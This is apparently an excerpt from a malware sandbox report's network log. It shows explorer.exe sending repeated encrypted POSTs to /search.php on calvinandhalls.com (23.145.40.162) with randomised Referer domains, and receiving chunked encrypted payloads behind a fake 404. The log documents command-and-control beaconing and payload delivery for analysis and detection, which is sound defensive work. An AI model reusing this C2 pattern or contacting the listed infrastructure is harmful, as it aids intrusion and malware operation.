2024-09-30 13:38:44 UTC	7898	IN	Data Raw: 31 65 65 36 0d 0a 19 00 00 00 1e 0d ae 5d 88 5b ab 97 21 0d dd 60 2e 7b 1d 32 50 01 72 3e c8 9a 69 4c 1d 00 8b 6e 04 00 2a 22 f8 44 01 02 02 00 06 00 9e 03 00 00 77 51 0b 6d 97 5a 5a 1a e7 4b 51 fa 07 40 40 00 56 e8 34 2a 99 34 df c4 22 b4 0c c2 c9 75 16 28 d6 e8 35 ae 87 4e 70 79 29 cd 23 c3 ef 0b d6 49 8b 19 b9 12 52 9b dd 05 05 4e 9f 97 7b e1 5f 69 8c b0 ed 65 43 56 5e 71 f5 4e 45 39 f4 04 e9 d0 a8 e9 4b 2b 4d 76 2a 66 fa 26 fe fc 55 8f 54 eb 33 b6 46 e0 cd 9b 34 02 35 6a 8c 34 70 c2 dc 6e 38 81 9d aa f9 df b3 6b b5 26 0a bf f8 36 e7 44 24 f5 0e af a7 0a 97 ae cb ad 65 6a 38 8e 2f df 47 1f 1a ad c3 3a f2 61 39 73 b3 62 24 2c b7 bd 31 c3 2f 23 8d 51 5a f1 9f b6 71 3e fe 3f 8a 3b 55 06 26 3f 4a 6b de aa db 22 7d b3 7d c9 db a3 3d 47 8d 1a 2c 1e 6a 9c fa Data Ascii: 1ee6][!`.{2Pr>iLn"DwQmZZKQ@@V44"u(5Npy)#IRN{_ieCV^qNE9K+Mv*f&UT3F45j4pn8k&6D$ej8/G:a9sb$,1/#QZq>?;U&?Jk"}}=G,j
2024-09-30 13:38:44 UTC	18	IN	Data Raw: 4a ad c8 4d b8 98 51 d7 c4 46 f4 20 38 32 b7 a2 a6 9c Data Ascii: JMQF 82
2024-09-30 13:38:44 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-09-30 13:38:44 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a c7 83 91 ea b4 80 43 43 d2 2a 76 48 28 fa e3 f3 9b 3d 20 10 9a 0e 07 b4 7c 20 db b8 5f 0e 1c e0 7a 74 62 c2 d5 38 50 ab b4 6a a0 56 ed 37 bc 2b 04 79 0c 1b 74 82 e9 04 9a 87 8c 66 71 e2 3a 32 bf 96 aa 85 56 f4 05 fa 48 17 d7 45 b4 74 c3 01 34 c3 54 3e 0c 3d 97 2a 26 cc e0 32 29 5f 8c 55 6d 85 ae 7f c0 d1 7a 0d e9 4b ea fe ab ed 75 74 7c 00 3d e6 71 31 34 c9 ac e6 53 30 c6 87 a5 c8 d7 15 65 b7 c3 61 c3 c5 8f c6 9a c4 80 03 25 d2 d0 09 db b2 89 46 e4 46 0c 7b d6 5d 28 c6 ce 93 0e a0 df 57 0e ee 82 b4 d0 a5 1f 04 45 b4 1f 58 9b 51 6b 96 da 7d 6f 25 58 7f c2 df 99 a3 df 79 d9 ef 51 30 8c 18 69 40 64 fe e0 0e f9 89 96 8f 98 34 d7 8c c5 72 ed 1a ee 52 45 71 1c 08 d3 19 12 f4 68 db 8e ab e2 ad 2e 10 cd bb fe ff 53 78 84 90 47 f0 6e 67 90 52 5f Data Ascii: 2000CCvH(= \| _ztb8PjV7+ytfq:2VHEt4T>=&2)_UmzKut\|=q14S0ea%FF{](WEXQk}o%XyQ0i@d4rREqh.SxGngR_
2024-09-30 13:38:44 UTC	6	IN	Data Raw: 97 20 09 6c 1a f8 Data Ascii: l
2024-09-30 13:38:44 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-09-30 13:38:44 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a c5 1b 8a ab 3f 66 45 20 c9 af 22 2e ab 70 95 3f 9f 17 d3 11 7d 81 a5 94 ec 3b f9 58 d1 55 e2 90 08 70 1a b8 60 26 7d 78 86 82 bc 9a 1b 61 79 3c 97 58 14 89 26 5c 44 88 a6 3d 96 1c 53 26 00 44 58 49 1b e8 f1 aa 9a db 4e 9f 66 5f 7d b0 b3 fc 57 ca ff 71 25 4f 88 ed 70 0f 16 b2 c4 bd 0e bf f3 dc 00 b7 f2 a5 f4 ae f3 f6 7a c8 37 8f 60 c1 38 d7 b6 f2 58 0d 76 ba c8 7a a6 13 3a 4c a3 b6 86 b9 a2 0c 4b 37 05 84 09 ed 08 4f 88 07 ea 9a 75 72 15 85 b8 4f 76 61 8c 31 de 65 cd 2a 97 ab 9b 29 53 ae e4 04 d8 0a b1 e7 9c e1 f6 76 b9 e7 13 2d 86 58 56 2e 7e 92 81 b1 d6 bd f7 64 fc 6f c7 85 3a 07 06 fb 78 ed f1 e2 16 f4 a8 e4 e2 30 06 ce 27 25 8a 9d db ba e3 ba 88 e2 96 64 d0 07 8e 10 df c5 fe 4c ef 98 b4 8c 08 a1 01 60 3f 7e ab c0 6c eb 06 f6 63 1f a5 Data Ascii: 2000?fE ".p?};XUp`&}xay<X&\D=S&DXINf_}Wq%Opz7`8Xvz:LK7OurOva1e*)Sv-XV.~do:x0'%dL`?~lc
2024-09-30 13:38:44 UTC	6	IN	Data Raw: 60 4f 16 27 c7 be Data Ascii: `O'
2024-09-30 13:38:44 UTC	2	IN	Data Raw: 0d 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49739	23.145.40.162	443	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:38:45 UTC	286	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://niarejwvgfav.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 318 Host: calvinandhalls.com
2024-09-30 13:38:45 UTC	318	OUT	Data Raw: 72 19 83 b9 f8 79 1c 82 69 86 e8 64 38 85 61 28 d8 f4 c3 db 66 7c 35 f9 72 07 b4 94 e0 ab 32 ea 0d 97 b9 f7 03 fc ab f2 83 0d d0 cd f3 2c 29 a0 bc bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6a 34 01 83 b7 25 93 3c 3d f5 6e b4 d2 b1 20 5e c6 6c 61 f3 71 f1 e1 62 20 ab 08 5b 4d 93 bd c1 53 ef d7 78 1a f4 a3 6c e6 55 3c a2 8b 04 15 48 73 3e 00 8d 38 8b e9 aa 2c f3 e7 77 0e 50 88 65 23 f3 50 03 fb 92 ec 92 14 75 95 1b b2 46 8b 32 58 dd 36 dd 77 53 7d 1f 7c c2 e4 4f ea b3 04 ec 27 71 f7 c0 d3 20 ff 83 7a bf 88 e1 de 07 67 ac 8c bf 55 4f 93 75 30 d0 3d 57 4a 91 6c 05 2c cb 4e 07 36 e6 b2 84 65 7f 98 ae 21 e6 49 ce e9 fb 3c 1c 3b 40 a3 76 7f 11 4b 03 b8 46 b3 c6 7e 01 2f 7c 3e f9 ea 33 7b 5a 36 d0 c1 fc 53 fc c2 3f c6 7c cd 83 e7 83 18 93 7c Data Ascii: ryid8a(f\|5r2,)%P g3iqH[@Lj4%<=n ^laqb [MSxlU<Hs>8,wPe#PuF2X6wS}\|O'q zgUOu0=WJl,N6e!I<;@vKF~/\|>3{Z6S?\|\|
2024-09-30 13:38:46 UTC	278	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:38:46 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49740	23.145.40.162	443	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:38:46 UTC	288	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://lkfxgtbclffake.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 141 Host: calvinandhalls.com
2024-09-30 13:38:46 UTC	141	OUT	Data Raw: 72 19 83 b9 f8 79 1c 82 69 86 e8 64 38 85 61 28 d8 f4 c3 db 66 7c 35 f9 72 07 b4 94 e0 ab 32 ea 0d 97 b9 f7 03 fc ab f2 83 0d d0 cd f3 2c 29 a0 bc bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6b 34 01 83 b7 25 93 3c 52 b1 28 f2 9a ee 13 1e c1 30 27 81 7e fd 84 6d 1b b2 67 46 27 d6 e3 c6 68 a7 a8 6d 0b f3 9b 60 99 53 2d bc ed 77 0a 35 19 42 21 f3 00 a9 d4 df 5f cd fa 4a 70 23 97 17 54 e8 30 17 86 fd cb Data Ascii: ryid8a(f\|5r2,)%P g3iqH[@Lk4%<R(0'~mgF'hm`S-w5B!_Jp#T0
2024-09-30 13:38:47 UTC	278	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:38:47 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49741	23.145.40.162	443	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:38:47 UTC	290	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://fyhvuoiqukrfjpjs.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 199 Host: calvinandhalls.com
2024-09-30 13:38:47 UTC	199	OUT	Data Raw: 72 19 83 b9 f8 79 1c 82 69 86 e8 64 38 85 61 28 d8 f4 c3 db 66 7c 35 f9 72 07 b4 94 e0 ab 32 ea 0d 97 b9 f7 03 fc ab f2 83 0d d0 cd f3 2c 29 a0 bc bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 68 34 01 83 b7 25 93 3c 23 bb 74 b1 b1 e5 40 32 a9 66 1e ec 26 c5 cd 22 1b a8 65 04 4c ab ca ee 2b a0 d6 0b 5b 9e fd 3a ae 5a 58 fd 86 05 3d 25 77 03 47 96 1d b7 95 a0 45 85 e0 30 71 56 8e 11 36 cc 3e 62 d8 ca bc d5 5b 6d b6 5d fa 21 a2 63 26 c7 37 d8 52 34 37 35 18 d6 fa 75 a6 a2 3f f2 0c 07 e0 ca a5 29 c5 fc 70 ae d2 9d a0 04 54 a3 a5 af 43 0d b6 75 3e ed 34 01 43 e4 54 03 41 fa 77 Data Ascii: ryid8a(f\|5r2,)%P g3iqH[@Lh4%<#t@2f&"eL+[:ZX=%wGE0qV6>b[m]!c&7R475u?)pTCu>4CTAw
2024-09-30 13:38:48 UTC	278	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:38:47 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49742	23.145.40.162	443	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:38:48 UTC	289	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://jmcgnnydyiyvfde.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 122 Host: calvinandhalls.com
2024-09-30 13:38:48 UTC	122	OUT	Data Raw: 72 19 83 b9 f8 79 1c 82 69 86 e8 64 38 85 61 28 d8 f4 c3 db 66 7c 35 f9 72 07 b4 94 e0 ab 32 ea 0d 97 b9 f7 03 fc ab f2 83 0d d0 cd f3 2c 29 a0 bc bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 69 34 01 83 b7 25 93 3c 49 ee 39 98 b4 d5 4c 3b cc 39 01 87 2b f5 9f 64 71 d6 07 31 4b ab d9 9f 44 b1 f5 19 1f c0 b9 21 93 47 33 98 80 1e 69 3c 6b 17 43 aa Data Ascii: ryid8a(f\|5r2,)%P g3iqH[@Li4%<I9L;9+dq1KD!G3i<kC
2024-09-30 13:38:49 UTC	278	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:38:48 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49743	23.145.40.162	443	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:38:50 UTC	285	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://vjdyvxrsjwk.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 205 Host: calvinandhalls.com
2024-09-30 13:38:50 UTC	205	OUT	Data Raw: 72 19 83 b9 f8 79 1c 82 69 86 e8 64 38 85 61 28 d8 f4 c3 db 66 7c 35 f9 72 07 b4 94 e0 ab 32 ea 0d 97 b9 f7 03 fc ab f2 83 0d d0 cd f3 2c 29 a0 bc bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6e 34 01 83 b7 25 93 3c 2e fd 6e ec c3 d1 0b 52 cb 31 27 f6 2a f5 9f 19 1f d1 2f 10 3c d2 a5 8e 30 cc fb 73 05 d6 8f 4b aa 30 21 9f 9c 1e 29 3d 68 3d 49 c2 62 dc 9e cf 02 8b af 2c 68 2a e3 11 00 bb 49 7a 87 c6 f2 d3 32 19 bf 53 a8 5a 82 0f 4b ce 39 d1 2c 78 57 75 1a a8 f5 5b e0 b1 35 f5 50 62 db b3 b6 5a e9 9a 63 f0 b0 fe 81 3b 4b cc 9a 9f 4c 5e d7 69 2f 93 2d 08 50 91 49 2b 3c df 18 68 0e d2 9f 87 40 Data Ascii: ryid8a(f\|5r2,)%P g3iqH[@Ln4%<.nR1'/<0sK0!)=h=Ib,hIz2SZK9,xWu[5PbZc;KL^i/-PI+<h@
2024-09-30 13:38:51 UTC	278	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:38:51 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49744	23.145.40.162	443	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:38:52 UTC	287	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://phwhrimonssxx.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 271 Host: calvinandhalls.com
2024-09-30 13:38:52 UTC	271	OUT	Data Raw: 72 19 83 b9 f8 79 1c 82 69 86 e8 64 38 85 61 28 d8 f4 c3 db 66 7c 35 f9 72 07 b4 94 e0 ab 32 ea 0d 97 b9 f7 03 fc ab f2 83 0d d0 cd f3 2c 29 a0 bc bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6f 34 01 83 b7 25 93 3c 3b db 06 94 a4 dc 04 20 a1 77 01 9f 50 81 f0 29 20 dc 2f 3f 36 a3 d2 86 5d b3 ac 15 41 da 89 41 8a 62 4a 82 fd 70 04 7e 10 0a 24 fe 1d d3 fb db 53 db b6 63 0b 1a a0 5c 22 b7 24 68 f1 fa 90 87 5f 76 d9 50 dd 67 83 18 54 9c 29 d2 4c 3f 3c 74 6a c7 fb 11 e2 8a 13 82 18 15 e7 aa 8e 04 be f1 6b 9f c4 a2 93 37 7a 9f b0 92 64 39 da 0a 27 9a 3d 40 50 88 45 1b 25 d5 15 00 34 90 ce 8e 25 23 c5 b1 6c 89 4b 85 ad c4 10 30 64 7e dc 7d 0d 75 3f 76 cc 3f fa d1 28 31 07 7c 52 d4 88 55 50 12 4b 9f ee 93 3c ea b3 34 fe 2c b4 b6 ec 91 49 d5 75 Data Ascii: ryid8a(f\|5r2,)%P g3iqH[@Lo4%<; wP) /?6]AAbJp~$Sc\"$h_vPgT)L?<tjk7zd9'=@PE%4%#lK0d~}u?v?(1\|RUPK<4,Iu
2024-09-30 13:38:52 UTC	278	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:38:52 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49745	23.145.40.162	443	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:38:52 UTC	285	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://hqblemeoblb.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 230 Host: calvinandhalls.com
2024-09-30 13:38:52 UTC	230	OUT	Data Raw: 72 19 83 b9 f8 79 1c 82 69 86 e8 64 38 85 61 28 d8 f4 c3 db 66 7c 35 f9 72 07 b4 94 e0 ab 32 ea 0d 97 b9 f7 03 fc ab f2 83 0d d0 cd f3 2c 29 a0 bc bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6c 34 01 83 b7 25 93 3c 4a ae 02 ff 81 b2 16 49 d1 2b 7c e9 42 92 c9 63 22 ab 73 0d 2d 9a a7 83 65 ac ec 08 0d 91 99 4a ea 71 63 b2 8b 78 68 5d 0b 41 27 ff 0f d7 8c 8b 1d 98 a6 73 07 59 93 41 14 f4 48 7b de fd 97 8f 2c 1a a8 0e f9 48 b7 6e 4d a9 2c a7 4e 6f 36 38 0a c2 f2 41 a5 ba 60 dd 38 10 f8 b2 bb 0a a3 8f 69 87 95 b3 95 43 59 df d2 a0 08 33 b9 16 55 9e 18 71 49 e9 3a 11 7b de 5a 6d 59 f6 bf 9a 2e 3c d3 c8 04 f7 29 cf dd e2 04 65 6a 3c f3 19 7d 68 0f 1c f1 5d 88 b3 76 64 Data Ascii: ryid8a(f\|5r2,)%P g3iqH[@Ll4%<JI+\|Bc"s-eJqcxh]A'sYAH{,HnM,No68A`8iCY3UqI:{ZmY.<)ej<}h]vd
2024-09-30 13:38:53 UTC	278	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:38:53 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49746	23.145.40.162	443	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:38:53 UTC	285	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://ffcibdqlkyf.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 192 Host: calvinandhalls.com
2024-09-30 13:38:53 UTC	192	OUT	Data Raw: 72 19 83 b9 f8 79 1c 82 69 86 e8 64 38 85 61 28 d8 f4 c3 db 66 7c 35 f9 72 07 b4 94 e0 ab 32 ea 0d 97 b9 f7 03 fc ab f2 83 0d d0 cd f3 2c 29 a0 bc bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6d 34 01 83 b7 25 93 3c 3f ce 7f 93 cc b1 33 20 df 11 0d 87 5c e4 98 01 77 b1 7c 54 75 dc ff 8d 31 d3 af 12 17 d9 eb 59 b3 32 5a 9c f3 73 09 21 12 5b 3e 8d 31 d3 e5 8b 0a f4 97 6f 1f 34 82 1f 36 b4 6f 51 d6 c0 9b 99 3e 60 bc 0c eb 27 99 7a 2e d7 07 d5 6a 4b 2d 0c 7d d1 e6 7d fa a2 0d dc 51 7e f2 e8 9c 45 eb b1 0a e7 a9 e9 a1 09 30 a1 cc 9f 65 5f b5 78 10 9f 6f 22 Data Ascii: ryid8a(f\|5r2,)%P g3iqH[@Lm4%<?3 \w\|Tu1Y2Zs![>1o46oQ>`'z.jK-}}Q~E0e_xo"
2024-09-30 13:38:54 UTC	278	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 13:38:54 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Length: 0 Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49747	23.145.40.162	443	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:38:54 UTC	289	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://ywfvqxxvpvjvadf.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 139 Host: calvinandhalls.com
2024-09-30 13:38:54 UTC	139	OUT	Data Raw: 72 19 83 b9 f8 79 1c 82 69 86 e8 64 38 85 61 28 d8 f4 c3 db 66 7c 35 f9 72 07 b4 94 e0 ab 32 ea 0d 97 b9 f7 03 fc ab f2 83 0d d0 cd f3 2c 29 a0 bc bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 62 34 01 83 b7 25 93 3c 30 a6 0a e6 96 ad 27 20 cf 2f 2d a6 25 d1 d0 63 7d e4 05 08 6d ae ce e9 41 ff b4 53 1b fc a4 21 89 79 6d 9e dc 16 73 56 1e 55 19 f9 05 89 9c ae 0e dc f1 42 66 55 92 09 04 e5 7b 13 ae Data Ascii: ryid8a(f\|5r2,)%P g3iqH[@Lb4%<0' /-%c}mAS!ymsVUBfU{
2024-09-30 13:38:55 UTC	294	IN	HTTP/1.1 404 Not Found Date: Mon, 30 Sep 2024 13:38:55 GMT Server: Apache/2.4.52 (Ubuntu) X-Frame-Options: DENY X-Content-Type-Options: nosniff X-Frame-Options: DENY X-Content-Type-Options: nosniff Content-Type: text/html; charset=utf-8 Connection: close Transfer-Encoding: chunked
2024-09-30 13:38:55 UTC	7898	IN	Data Raw: 31 65 65 37 0d 0a 00 00 b5 50 0f 6d f7 61 d7 e7 49 78 ba 09 bf db 6e 5b 92 64 4f 0c f1 aa 5d 78 6e 1d 37 6e a3 bf 51 b7 61 50 c8 4c 75 ec 96 6c 61 47 6f 72 d9 5d 28 4a c9 17 cf ae b0 92 75 82 7c d6 cc 92 b4 cc 04 6e 80 d9 27 08 88 90 7c 25 38 3b 06 b0 d9 98 1f b3 ee 24 b2 8e 94 c4 c7 84 78 7f df ff 07 32 07 d4 23 b4 c2 cf a3 d9 18 29 4c b6 6d 7e 16 31 ba 88 9c 6f 27 9e 77 77 ec 42 27 39 f1 c8 b5 0f 2b 2c 37 f5 27 0c ee 96 8c 2c eb 7f 13 2a 58 0b a1 c6 4a a5 04 a5 ee 06 88 e3 1d 96 d0 4c d7 1a 1c 0b 6e 31 a2 fd 08 4f 89 d7 29 16 31 bd a7 21 aa 5c b5 b5 55 45 44 dc a1 75 85 c1 e8 06 3a f3 80 41 02 4f fe 76 f4 a8 10 4e 8c 77 26 ec 91 05 1d da 3e 11 60 70 e2 86 3d ef 6e dd fe db a9 55 d9 c9 a4 f3 ac ba 08 34 ee fb c7 34 41 b5 cd 3a 1d 0c d7 46 85 07 8f 3d 07 Data Ascii: 1ee7PmaIxn[dO]xn7nQaPLulaGor](Ju\|n'\|%8;$x2#)Lm~1o'wwB'9+,7',*XJLn1O)1!\UEDu:AOvNw&>`p=nU44A:F=
2024-09-30 13:38:55 UTC	19	IN	Data Raw: 1a 58 b1 16 d2 fd ef 1b ab d7 46 98 af 19 24 1b 3c de a6 Data Ascii: XF$<
2024-09-30 13:38:55 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-09-30 13:38:55 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 4f b0 ac 7b 5b 94 2f 8e fb a5 49 75 0f 40 51 70 86 33 86 ea 54 c2 9c a9 b3 9c cf 10 ce 73 f3 0a 45 73 70 80 bd cf 7c c6 1c 25 20 f0 db 31 01 72 f0 5d 54 16 83 19 c9 78 43 66 d9 c7 7f 47 ca 0f f7 a2 70 1e 62 4f 97 d4 85 58 23 aa d0 91 09 29 ee 80 ff 8b 54 15 25 28 bd e0 44 37 f5 d2 98 eb 0f e0 d6 36 42 df 9d 30 3b 76 0a 49 8d d8 2a 5a 2c 48 85 64 39 6f df 29 ee ea 49 62 42 61 fc 57 6e 83 9a b6 22 77 a6 6b e0 cf c9 e4 7a 54 6a 49 6b 6f 35 b7 56 48 95 56 16 b2 96 49 9e ba 4c 2c 9b 9c 43 42 13 5b a3 ab 34 c0 82 5d a9 9e 70 45 78 63 d2 8a a7 06 b3 53 cc e2 23 f1 5f eb 82 a9 0c ba 27 c8 99 eb 5e 0c 15 68 6c d4 ae e1 12 2f 24 0c 48 6d a6 03 50 bc 8c c8 19 7b 50 c9 e8 5e 04 70 28 b9 77 49 81 50 c8 50 6b ae b4 0b 13 a5 ca 64 4c e6 f3 cd d4 f6 e4 Data Ascii: 2000O{[/Iu@Qp3TsEsp\|% 1r]TxCfGpbOX#)T%(D76B0;vI*Z,Hd9o)IbBaWn"wkzTjIko5VHVIL,CB[4]pExcS#_'^hl/$HmP{P^p(wIPPkdL
2024-09-30 13:38:55 UTC	6	IN	Data Raw: 4e 13 8c ae b0 c5 Data Ascii: N
2024-09-30 13:38:55 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-09-30 13:38:55 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 35 b2 82 d9 81 f6 49 55 1c 8d 04 5f c4 c2 8a 45 ec 18 f5 d8 fd a3 a0 c4 ae 36 1a 9f e2 f9 78 50 95 22 b7 53 4f 27 b1 f4 18 0e 17 d3 04 0a 15 7b 21 da bb 61 41 09 53 89 63 26 06 92 dd b9 cb 36 d9 2b b1 d3 b5 7f 99 b4 fd 21 7f 68 a1 a3 9a c8 f2 df ce 50 b9 f6 65 4b 05 db dd 03 f4 43 65 c4 8c 61 3e 97 ba 4a 79 8f 0c fe ee 9a 91 1c 6c 77 25 cd 44 8c b3 ad 55 8f 66 a4 df a5 4c f4 c9 c1 69 5d 48 0b 4f 32 71 7a 52 6c c0 39 48 fa 96 d0 c8 ec f4 9c a0 0a 28 2c 0e 70 0f 5f 56 3f 57 12 a8 f7 ec d3 73 0d 42 60 a6 37 ca 65 e1 1c 43 c8 32 77 4f a8 25 84 73 8c 57 fe fd 9b 22 07 c9 76 65 b4 ed 87 11 52 c9 bd 4c b2 d4 66 9f da 30 3f 8d 93 5a f7 d7 f1 5d 31 3d a5 2c 47 87 4b 21 aa 61 84 35 f5 f7 9a 70 4c 4f fb 1e f9 e1 fe d1 ec c9 ff 05 71 1e 89 dd 8a 35 Data Ascii: 20005IU_E6xP"SO'{!aASc&6+!hPeKCea>Jylw%DUfLi]HO2qzRl9H(,p_V?WsB`7eC2wO%sW"veRLf0?Z]1=,GK!a5pLOq5
2024-09-30 13:38:55 UTC	6	IN	Data Raw: eb 47 a6 2d 95 51 Data Ascii: G-Q
2024-09-30 13:38:55 UTC	2	IN	Data Raw: 0d 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49748	23.145.40.162	443	4084	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 13:38:56 UTC	285	OUT	POST /search.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: https://dbbwmiqkkpy.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 316 Host: calvinandhalls.com
